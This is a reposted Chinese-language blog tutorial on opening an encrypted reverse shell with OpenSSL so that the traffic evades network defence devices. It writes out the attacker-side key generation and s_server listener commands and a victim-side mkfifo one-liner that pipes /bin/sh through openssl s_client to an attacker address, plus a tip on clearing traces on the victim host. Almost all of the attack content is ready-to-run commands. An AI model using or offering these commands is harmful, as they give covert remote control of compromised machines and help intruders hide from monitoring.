ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

Reverse-Encrypted-Shell-via-Openssl

2019-10-25 14:52:40  阅读:285  来源: 互联网

标签:tmp shell pem Encrypted openssl Shell cert via key


目录

0x01 简介

使用常规NC或者其他常规的方法反弹shell,由于流量都是明文的,很容易被网络防御设备检测到,因此需要对传输内容进行混淆或者加密。并且几乎每一个https都有openssl库,方便我们使用openssl反弹shell。下面将在linux下进行演示。

0x02 使用openssl反弹加密shell

linux
2.1 生成密钥

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

自生成密钥会提示输入证书信息,如果懒人就可以一路回车。回在本目录下生成文件 key.pem cert.pem
启动监听

openssl s_server -quiet -key key.pem -cert cert.pem -port 23

此时在攻击机23端口上启动了SSL/server服务
2.2 受害主机上反弹加密shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.30.119:23 > /tmp/s; rm /tmp/s


tips:
1.需要注意的是,当攻击机断开连接的时候回在受害主机上提示,需要适当清除。

标签:tmp,shell,pem,Encrypted,openssl,Shell,cert,via,key
来源: https://www.cnblogs.com/Rightsec/p/11736747.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有